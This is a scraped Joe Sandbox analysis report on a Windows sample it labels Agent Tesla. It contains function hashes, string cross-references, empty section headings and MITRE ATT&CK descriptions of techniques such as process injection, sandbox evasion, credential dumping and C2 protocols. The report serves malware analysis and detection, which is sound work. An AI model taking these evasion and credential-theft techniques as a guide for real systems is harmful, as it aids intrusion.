Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6e74abfeb00327b15dfbbb4ea18631454e7e15ff6f15bd8e4be2045f49c9cd
Instruction ID: 0e3d7d1071220710deffcb92a592a889425d3d39cc6a2d7a26c1b0679693477f
Opcode Fuzzy Hash: 3e6e74abfeb00327b15dfbbb4ea18631454e7e15ff6f15bd8e4be2045f49c9cd
Instruction Fuzzy Hash: DB11CFB5D01259AFCB00CF9AD884ADEFBB4FB48324F10812AE918B7340D374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06673E50 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 508298843669773c1fade92ac5060d6574c3db3d682f2ce7b26a34d65e5de931
Instruction ID: 3d811d9e91ff10d65cfb953c0e917d98fcf9e7272140f15c4992897a80f0049f
Opcode Fuzzy Hash: 508298843669773c1fade92ac5060d6574c3db3d682f2ce7b26a34d65e5de931
Instruction Fuzzy Hash: 4001DC30B101191BDB6496ADD814B2FA6DADBCA724F20883AE00ED7380DE21DC424395

Uniqueness

Uniqueness Score: -1.00%

Function 0667A350 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f739b6131ac2257498f55cc497c446724b0a7faf76de53898f3e9e274d78788a
Instruction ID: eef9718153f813fb29a47a1c669d8b44015e0a5acee3362633dba35b56c32102
Opcode Fuzzy Hash: f739b6131ac2257498f55cc497c446724b0a7faf76de53898f3e9e274d78788a
Instruction Fuzzy Hash: B301BC30F142059FCB61DAB8D461A1FB7E5EB8A624F108429E00ACB395EE25DC418781

Uniqueness

Uniqueness Score: -1.00%

Function 0667EDE8 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f81bcdca648661b195f7566a5b75bc43b02c2c19dfc84c996b45785ffe51149e
Instruction ID: 1b67955d253e7f99bb199344b145d812bae4f9300d45dbbd40fc3f68222d9f95
Opcode Fuzzy Hash: f81bcdca648661b195f7566a5b75bc43b02c2c19dfc84c996b45785ffe51149e
Instruction Fuzzy Hash: 9301FF31F000145BCB64967DE854B2F63DADBCAB20F108839E10ECB340EE66DC064385

Uniqueness

Uniqueness Score: -1.00%

Function 0667A360 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 629e273ca9dad346cb0fe7cef36c1f516d67fe369543e476f26b4f1bd3195c37
Instruction ID: c502448b1d8130a1dffd66bfede9958005e9d8893b0f7f09ff2c531fe6d94218
Opcode Fuzzy Hash: 629e273ca9dad346cb0fe7cef36c1f516d67fe369543e476f26b4f1bd3195c37
Instruction Fuzzy Hash: 8C018130F105155BDB60DABCD555B1F73D5E789724F108428E10AC7344EE21DC418781

Uniqueness

Uniqueness Score: -1.00%

Function 066764B8 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 696137b2908e62881f39c0a05f5e83c9832534cbbf1ca6a09a2070f9d617d471
Instruction ID: e55bb9a27126bd3a60902da9e0436223077f1f81663a0dc968477205644558c7
Opcode Fuzzy Hash: 696137b2908e62881f39c0a05f5e83c9832534cbbf1ca6a09a2070f9d617d471
Instruction Fuzzy Hash: C7E08071D155489BDF90CAB0DB1535B77A5E702204F24C9B6C41DC7341F236CE05E740

Uniqueness

Uniqueness Score: -1.00%

Function 066764C8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b18360c445daeed6c0431c8d2255b4635347293db7de6383a2d9fac2eca7d1b
Instruction ID: a312dbbdafafc2573af75f2cca82ad1a6bf6498d0da78413620d55c48623ee95
Opcode Fuzzy Hash: 5b18360c445daeed6c0431c8d2255b4635347293db7de6383a2d9fac2eca7d1b
Instruction Fuzzy Hash: C4E01271E1410CABDF60DEB4D95575BB7ADE702214F20C4A9D419C7305E676DA41D780

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 066776E8 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$^q, xrefs: 06677C69
$^q, xrefs: 06677832
$^q, xrefs: 06677C7F
$^q, xrefs: 06677C5D
$^q, xrefs: 0667780D
$^q, xrefs: 06677801
$^q, xrefs: 06677BCA
$^q, xrefs: 06677C73
$^q, xrefs: 0667783E
$^q, xrefs: 06677BBE

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2222239885
Opcode ID: 7621460350810f7aff48cc233041340b2bb44983392c89b874e2651a1599ed0a
Instruction ID: ccbe6450bcd1354abb565dc501035451e3ad5281ef6ffe161d82ed451760cc46
Opcode Fuzzy Hash: 7621460350810f7aff48cc233041340b2bb44983392c89b874e2651a1599ed0a
Instruction Fuzzy Hash: C2120E30E006198FDB68DF65C954AAEBBF2BF88704F2085A9D509AB354DB31DD85CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0667A980 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$^q, xrefs: 0667AB08
$^q, xrefs: 0667AAFC
$^q, xrefs: 0667AB3E
$^q, xrefs: 0667AA76
$^q, xrefs: 0667AADD
$^q, xrefs: 0667AB32
$^q, xrefs: 0667AAD1
$^q, xrefs: 0667AA82

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: a6fb993cf74ad7eec6dd5832ef7ddee354a3293214762e4b3b53e48c412ad132
Instruction ID: 5e8d8c89cba9b58c3ec6d3b6aa934af78ade544a9d15095210cd2632cb19cf23
Opcode Fuzzy Hash: a6fb993cf74ad7eec6dd5832ef7ddee354a3293214762e4b3b53e48c412ad132
Instruction Fuzzy Hash: 93916F30E10209EFDB68DFA5D654BAEB7F2BF84705F208529E4019B394DB359D45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 066770E8 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$^q, xrefs: 06677430
$^q, xrefs: 066773CA
$^q, xrefs: 066775FC
.5vq, xrefs: 06677143
$^q, xrefs: 06677424
$^q, xrefs: 06677584
$^q, xrefs: 066775F0

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-390881366
Opcode ID: c48d86f35d116a1e20d6d811cac7390473c78ef48f15398bfb037ef051cf19e7
Instruction ID: 8b99dd9024ad45d0fe84ca33d5ababff9beeea5edf92c9ae2281c2525fec3df6
Opcode Fuzzy Hash: c48d86f35d116a1e20d6d811cac7390473c78ef48f15398bfb037ef051cf19e7
Instruction Fuzzy Hash: 99F13E30B00209CFDB59EF69D654A5EBBB2FF88704F248568D4059B7A8DB35ED86CB40

Uniqueness

Uniqueness Score: -1.00%

Function 06678420 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$^q, xrefs: 06678686
$^q, xrefs: 066786DF
$^q, xrefs: 066786EB
$^q, xrefs: 0667867A

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 916fd0b91331dbee1c0b319123d0a9ef4b6dbfd84a9501a85b18ca6051ca2404
Instruction ID: e9f19f6adec36e116fb30edbe637ce4a2865712808ae088b7afea3fa7c5e1550
Opcode Fuzzy Hash: 916fd0b91331dbee1c0b319123d0a9ef4b6dbfd84a9501a85b18ca6051ca2404
Instruction Fuzzy Hash: FBB12D30A102098FDB58DF69D594A9EB7B2BF88304F24893DD406DB399DB75DC86CB81

Uniqueness

Uniqueness Score: -1.00%

Function 06678838 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$^q, xrefs: 066788C3
$^q, xrefs: 066788B7
LR^q, xrefs: 0667892B
LR^q, xrefs: 0667897A

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q
API String ID: 0-2454687669
Opcode ID: da0dd9e77e447b27d0fe7fb585efc763eb29cf596666876ff22c7c323ea69a97
Instruction ID: 3e1c586e7ca5429f467f19390c03343ed26d34ce185c70489d9027b1bfa0b430
Opcode Fuzzy Hash: da0dd9e77e447b27d0fe7fb585efc763eb29cf596666876ff22c7c323ea69a97
Instruction Fuzzy Hash: 9151B330B002059FDB58EB68D948A6AB7E6FF88304F14896DE4059F3A9DF30EC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0667AD0B Relevance: 5.2, Strings: 4, Instructions: 162COMMON

Download Yara Rule

Strings

$^q, xrefs: 0667AEE4
$^q, xrefs: 0667AE39
$^q, xrefs: 0667AEBB
$^q, xrefs: 0667AE8C

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 83b9fd0335c4de91895f7a46194e01a962b91db8f2d21bf44ea64f12683a6abb
Instruction ID: 90b7aef7414cbbb878b0488f2609fa638eae0929866234d8daa995d2f3a58753
Opcode Fuzzy Hash: 83b9fd0335c4de91895f7a46194e01a962b91db8f2d21bf44ea64f12683a6abb
Instruction Fuzzy Hash: C0518031E102098FDF69DBA4D580AAEB7B2FF88715F148529E805EB355DB35DC42CB81

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report T_240369_S#U0130PAR#U0130S.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\T_240369_S#U0130PAR#U0130S.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
T_240369_S#U0130PAR#U0130S.exe

Function 05C0EBB8 Relevance: 7.2, Strings: 5, Instructions: 983
COMMON

Function 02F6A130 Relevance: 3.6, Strings: 2, Instructions: 1081
COMMON

Function 05AD74C8 Relevance: 4.2, Strings: 3, Instructions: 479
COMMON

Function 05AD9188 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Function 05ADD752 Relevance: 4.0, Strings: 3, Instructions: 217
COMMON

Function 05AD3A19 Relevance: 3.0, Strings: 2, Instructions: 484
COMMON

Function 05AD6B78 Relevance: 2.8, Strings: 2, Instructions: 338
COMMON

Function 059B18C0 Relevance: 2.8, Strings: 2, Instructions: 332
COMMON

Function 059B24A8 Relevance: 2.8, Strings: 2, Instructions: 279
COMMON

Function 059B1598 Relevance: 2.7, Strings: 2, Instructions: 231
COMMON

Function 05AD2FE8 Relevance: 2.7, Strings: 2, Instructions: 174
COMMON

Function 05AD55A9 Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Function 05E7F620 Relevance: 2.6, Strings: 2, Instructions: 132
COMMON

Function 05AD41E8 Relevance: 2.6, Strings: 2, Instructions: 53
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre